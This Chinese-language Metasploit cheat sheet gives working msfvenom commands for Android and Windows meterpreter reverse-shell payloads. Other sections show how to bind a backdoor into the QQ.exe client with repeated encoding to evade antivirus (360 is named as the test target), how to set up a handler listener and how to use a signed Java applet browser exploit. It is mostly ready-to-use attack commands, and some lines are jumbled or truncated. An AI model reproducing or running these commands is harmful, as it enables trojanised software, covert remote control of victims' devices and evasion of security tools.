针对 Android
生成apk
1
| sudo msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.107 LPORT=4444 R > androTor.apk
|
设置服务器接收
以下在msfconsole中操作:
1 2 3 4 5 6 7 8 9
| use exploit/multi/handler set PAYLOAD /meterpreter/ show set exploit
|
针对 Win 8
java applet
可以参考以下视频演示
1 2 3 4 5 6 7 8 9 10 11
| use exploit/multi/browser/java_signed_applet set PAYLOAD windows/meterpreter/reverse_tcp show options set SRVHOST <attacker's ip addr>
set LHOST <attacher's ip addr> exploit
|
可执行文件
此处可以参考这个视频
1
| msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.107 LPORT=4444 -f exe -e x86/shikata_ga_nai -i 10 > EXPLOIT.exe
|
混合大法
1 2 3 4 5 6 7 8 9 10 11
| R raw -c 编码次数 -x 这个是对某一个软件附加payload的选项。比如msfencode -i shell.exe –x qq.exe 这个命令就是说我把一个叫做shell.exe的后门添加到了一个叫做qq.exe的软件里面。 -k 如果你使用了-x和-k参数。当你的payload运行后,它会从原始的主文件中分离出来,单独创建一个进程,并且运行。这个也是一个免杀的思路。 msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.107 LPORT=8080 R \ | msfencode -e x86/shikata_ga_nai -c 5 -t raw \ | msfencode -e x86/alpha_upper -c 2 -t raw \ | msfencode -e x86/shikata_ga_nai -c 5 -t raw \ | msfencode -e x86/countdown -c 5 -t exe -x /home/ray/dev/hack/backdoor/QQ.exe \ -k -o /home/ray/dev/hack/backdoor/QQHD.exe
|
查看编码器
1 2 3 4 5
| msfvenom --list x86/shikata_ga_nai x86/alpha_upper x86/countdown
|
文件混合
1
| msfvenom -a x86 --platform windows -x /home/ray/dev/hack/backdoor/QQ.exe -k -p windows/meterpreter/reverse_tcp lhost=192.168.0.107 lport=8080 -b "\x00" -f exe -e x86/shikata_ga_nai -i 17 -o qqbd.exe
|
bypass AV
主要以360为测试对象,对于特征查杀,Meterpreter基本可以依靠编码器/加密通过,不过行为查杀较难通过。
[1] 那些年一起绕过的杀软
[2] 好免杀,hyperion造
[3] 闲谈 bypass AV
[4] encode msf shellcode绕过杀毒
[5] Veil—绕过杀毒软件的payload生成器
[6] UPX以及数字签名
参考资料
[1] Meterpreter Guide - wooyun知识库
[2] 《Metasploit 渗透测试魔鬼训练营》
[3] 玩转Metasploit系列(第六集)- Freebuf
[4] Kali 官方指导
[5] MSF 目录树
[6] 初探 Meterpreter
[7] metasploit网马的简单提取